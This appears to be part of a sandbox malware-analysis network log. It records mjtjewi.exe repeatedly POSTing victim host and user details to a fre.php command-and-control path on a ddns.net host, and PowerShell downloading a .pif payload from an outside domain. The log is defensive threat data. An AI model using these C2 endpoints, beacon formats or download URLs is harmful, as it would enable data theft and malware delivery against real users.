Oct 3, 2024 09:22:25.816015959 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:26.473027945 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.11	64430	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:26.654994965 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:26.659849882 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:27.331634998 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.11	64431	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:27.499201059 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:27.504132032 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:28.156263113 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.11	64432	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:28.306813955 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:28.311778069 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:29.195664883 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.11	64433	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:29.634440899 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:29.639445066 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:30.480031967 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.11	64434	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:30.641104937 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:30.646051884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:31.486274004 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.11	64435	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:31.669754982 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:31.674681902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:32.303347111 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.11	64436	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:32.497924089 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:32.502916098 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:33.187992096 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.11	64437	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:33.334327936 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:33.340490103 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:34.292666912 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.11	64438	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:34.443031073 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:34.448158026 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:35.079196930 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.11	64439	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:35.220199108 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:35.225001097 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:35.848511934 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.11	64440	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:36.009468079 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:36.015475988 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:36.750042915 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.11	64441	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:36.912101984 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:36.917140007 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:37.777426004 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.11	64442	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:37.926255941 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:37.931400061 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:38.687633038 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.11	64443	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:38.831857920 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:38.836711884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:39.523708105 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.11	64444	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:39.676918030 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:39.681925058 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:40.350311041 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.11	64445	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:40.609555960 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:40.614660025 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:41.352128983 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.11	64446	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:41.552056074 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:41.558182955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:42.187657118 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.11	64447	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:42.339214087 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:42.344415903 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:43.088213921 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.11	64448	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:43.246021032 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:43.251789093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:43.910703897 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.11	64449	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:44.062635899 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:44.067473888 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:44.839922905 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49710	188.114.96.3	443	4552	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:41 UTC	196	OUT	GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1 Host: www.sodiumlaurethsulfatedesyroyer.com Connection: Keep-Alive
